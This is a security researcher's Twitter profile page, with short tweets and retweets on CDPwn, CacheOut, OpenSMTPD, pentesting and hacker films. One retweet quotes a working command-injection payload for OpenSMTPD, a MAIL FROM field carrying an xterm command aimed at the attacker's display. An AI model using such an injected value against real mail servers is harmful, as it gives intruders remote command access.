Pedro Ribeiro
@pedrib1337

Reverse Engineer, Director of Research at Agile Information Security and member of Pwn2Own Flashback team. My pronouns are pwn/pwner.

305 Tweets
147 Following
668 Followers

Tweets
|
Pedro Ribeiro
@pedrib1337
24h
Awesome!
|
Pedro Ribeiro
@pedrib1337
Feb 6
Little things like "technical details" don't matter when you need an eye catching headline
|
Pedro Ribeiro
@pedrib1337
Feb 6
I think that's a problem as a researcher in general.
The rabbit holes get smaller and smaller with ASLR and other protections, but as complexity increases we also get more of those holes
|
Pedro Ribeiro
@pedrib1337
Feb 5
The link to the cdpwn on their website seems to be dead
|
Pedro Ribeiro retweeted
Catalin Cimpanu
@campuscodi
Feb 5
CDPwn vulnerabilities impact tens of millions of enterprise devices
- CDPwn impacts Cisco's Discovery Protocol (CDP)
- CDPwn = 4 RCEs + 1 DOS
- LAN exploitable, not via WAN
- ideal for escalating access and taking over entire networks
zdnet.com/article/cdpwn-… pic.twitter.com/eOoZIl2T8R
|
Pedro Ribeiro
@pedrib1337
Jan 30
Doesn't beat The Matrix, but it's still better than Hackers
|
Pedro Ribeiro
@pedrib1337
Jan 30
Never seen it, but looks good! It's now on my list
|
Pedro Ribeiro
@pedrib1337
Jan 30
Unpopular opinion: "Hackers" (1995) is a shit film, and the ultimate hacker film is "The Matrix" (1999)
|
Pedro Ribeiro retweeted
Joxean Koret
@matalaz
Jan 30
OpenBSD sEcUrE bY DeFaUlT exploit:
MAIL FROM:<;xterm --display yourip:0;>
|
Pedro Ribeiro retweeted
Ghidra Ninja
@ghidraninja
Jan 29
If you are into C++ reverse engineering and never tried OOAnalyzer you are missing out big time! insights.sei.cmu.edu/sei_blog/2019/…
|
Pedro Ribeiro
@pedrib1337
Jan 29
Now if only Intel fixed their iommu - on some systems it is hopelessly broken and causes lots of crashes.
|
Pedro Ribeiro retweeted
dragosr
@dragosr
Jan 29
Old school, mail to shell script, code exec and privilege escalation in OpenSMTPD
openwall.com/lists/oss-secu…
|
Pedro Ribeiro retweeted
D̒͂̕ᵈăᵃn̕ᶰ Ť̾̾̓͐͒͠ᵗe͗̑́̋̂́͡ᵉn̅ᶰtᵗl̀̓͘ᶫe̓̒̂̚ᵉrʳ
@Viss
Jan 27
can confirm.
enable defender, crank it all the way up. as a redteamer, i can say it's a pain in the ass to get around, so defenders should take advantage of that. twitter.com/mshelton/statu…
|
Pedro Ribeiro
@pedrib1337
Jan 27
Very interesting - are you publishing a PoC?
|
Pedro Ribeiro
@pedrib1337
Jan 27
"Moreover, CacheOut bypasses the hardware mitigations released by Intel in response to Meltdown, thereby necessitating additional software fixes."
|
Pedro Ribeiro
@pedrib1337
Jan 27
Another nail in the coffin of Intel's supposed performance advantage:
"AMD is not affected by CacheOut, as AMD does not offer any feature akin to Intel TSX on their current offering of CPUs." twitter.com/MarinaMinkin/s…
|
Pedro Ribeiro
@pedrib1337
Jan 27
Reminder that if you're not paying, you're the product twitter.com/josephfcox/sta…
|
Pedro Ribeiro
@pedrib1337
Jan 26
Then I'm definitely complaining to the right person
|
Pedro Ribeiro
@pedrib1337
Jan 26
And the problem is, either there aren't enough of those around, or companies don't want to pay for them.
|
Pedro Ribeiro
@pedrib1337
Jan 26
Just goes to show, you can model all you want, you will still get owned.
Not saying it's not worth it, but definitely has to be supported by highly skilled "manual" pentesters.
|